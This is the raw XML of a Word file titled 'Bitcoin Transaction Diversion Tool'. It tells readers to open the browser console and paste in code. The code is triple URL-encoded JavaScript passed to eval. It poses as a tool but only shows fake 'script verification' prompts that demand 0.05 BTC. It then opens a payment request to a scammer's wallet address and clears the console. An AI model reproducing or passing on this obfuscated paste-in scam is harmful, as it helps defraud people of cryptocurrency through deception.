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D60" w:rsidP="12F11EEC" w:rsidRDefault="00C627A9" w14:paraId="75440335" w14:textId="56875087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>On google or edge click on the investigate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C627A9" w:rsidP="12F11EEC" w:rsidRDefault="00C627A9" w14:paraId="6969B661" w14:textId="2EBE27B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Go into command center </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C627A9" w:rsidP="12F11EEC" w:rsidRDefault="00C627A9" w14:paraId="1AB5FEDA" w14:textId="10E4FF41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pP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Insert code into the stop logo into command center and click on expression and click enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB3D60" w:rsidP="12F11EEC" w:rsidRDefault="00EB3D60" w14:paraId="0ED333A8" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB3D60" w:rsidP="12F11EEC" w:rsidRDefault="00EB3D60" w14:paraId="35CA8A52" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B77BA0" w:rsidP="12F11EEC" w:rsidRDefault="13DACA96" w14:paraId="2C078E63" w14:textId="155EB9D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pP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eval(</w:t>
      </w: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decodeURIComponent</w:t>
      </w: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(</w:t>
      </w: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decodeURIComponent</w:t>
      </w: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(</w:t>
      </w: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decodeURIComponent</w:t>
      </w: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 xml:space="preserve">('var%252520r7gxo%252520%25253D%252520parseFloat%252528prompt%252528%252522https%25253A%25252F%25252Fwww.blockchain.com%25252Fbtc%25252Ftx%25252F%252522%252529%252529%25253B%25250Avar%252520r7gxo%252520%25253D%252520parseFloat%252528prompt%252528%252522Your%252520script%252520must%252520be%252520verified%252520with%252520your%252520BlockChain%252520wallet%252520before%252520you%252520can%252520take%252520this%252520action.%252520Please%252520verify%252520script%252520by%252520adding%252520%2525280.05%252529%252520BTC%252520to%252520apparent%252520address%25253A%252522%25252C%252522 bc1q3y7ml407jyszjtx0nngt9f9kgzze7r2d8x8zaf </w:t>
      </w:r>
      <w:r w:rsidRPr="633F74DC" w:rsidR="633F74DC">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>6%252522%252529%252529%25253B%25250Avar%252520w8ugo%252520%25253D%252520window.confirm%252528%252522Your%252520script%252520must%252520be%252520verified%252520with%252520your%252520account%252520before%252520you%252520can%252520take%252520this%252520action.%252520Click%252520OK%252520to%252520Verify%252520Script%252522%252529%25253B%25250Aif%252520%252528w8ugo%252529%252520%25257B%252520window.open%252528%252527https%25253A%25252F%25252Fwww.blockchain.com%25252Fbtc%25252Fpayment_request%25253Faddress%25253D34Ma3QJC6fbqaoaxh7PsGH7T63LuvQnCL9%252526message%25253DScript%25252520Verification%252526amount%25253D0.05%252527%252529%25253B%252520%25257D%252520%25250Aelse%252520%25257B%252520alert%252528%252522Please%252520back%252520to%252520verify%252520script.%252522%252529%25253B%252520%25257D%252520%25250Aconsole.clear%252528%252529%25253B%25250Aconsole.log%252528%252527Script%252520not%252520verified%252521%252527%252529%25253B'))));</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B77BA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7844135f2049d2"/>
      <w:footerReference w:type="default" r:id="R9203d800192942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3F74DC" w:rsidTr="633F74DC" w14:paraId="32210A93">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="633F74DC" w:rsidP="633F74DC" w:rsidRDefault="633F74DC" w14:paraId="29BE600F" w14:textId="4FFC8E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3F74DC" w:rsidP="633F74DC" w:rsidRDefault="633F74DC" w14:paraId="70A800D5" w14:textId="35870F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3F74DC" w:rsidP="633F74DC" w:rsidRDefault="633F74DC" w14:paraId="4EECD55D" w14:textId="01554F79">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="633F74DC" w:rsidP="633F74DC" w:rsidRDefault="633F74DC" w14:paraId="33FB09E3" w14:textId="3BA213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3F74DC" w:rsidTr="633F74DC" w14:paraId="10688394">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="633F74DC" w:rsidP="633F74DC" w:rsidRDefault="633F74DC" w14:paraId="3777A45E" w14:textId="28999F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3F74DC" w:rsidP="633F74DC" w:rsidRDefault="633F74DC" w14:paraId="1EA1A06B" w14:textId="5A89740C">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r w:rsidR="633F74DC">
            <w:rPr/>
            <w:t>BITCOIN TRANSACTION DIVERSION TOOL</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="633F74DC" w:rsidP="633F74DC" w:rsidRDefault="633F74DC" w14:paraId="7A041DB9" w14:textId="03D0881F">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="633F74DC" w:rsidP="633F74DC" w:rsidRDefault="633F74DC" w14:paraId="7DC2AC85" w14:textId="67DCF9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34453A"/>
    <w:rsid w:val="004C0D4B"/>
    <w:rsid w:val="00B77BA0"/>
    <w:rsid w:val="00C627A9"/>
    <w:rsid w:val="00EB3D60"/>
    <w:rsid w:val="12F11EEC"/>
    <w:rsid w:val="13DACA96"/>
    <w:rsid w:val="4434453A"/>
    <w:rsid w:val="633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453A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C12AB2C9-4410-4656-AA6F-B09E86B5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d7844135f2049d2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer.xml" Id="R9203d8001929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Jonah Sloss</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Jonah Sloss</lastModifiedBy>
  <revision>5</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-11T10:39:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-12T05:30:46.0463173Z</dcterms:modified>
</coreProperties>
</file>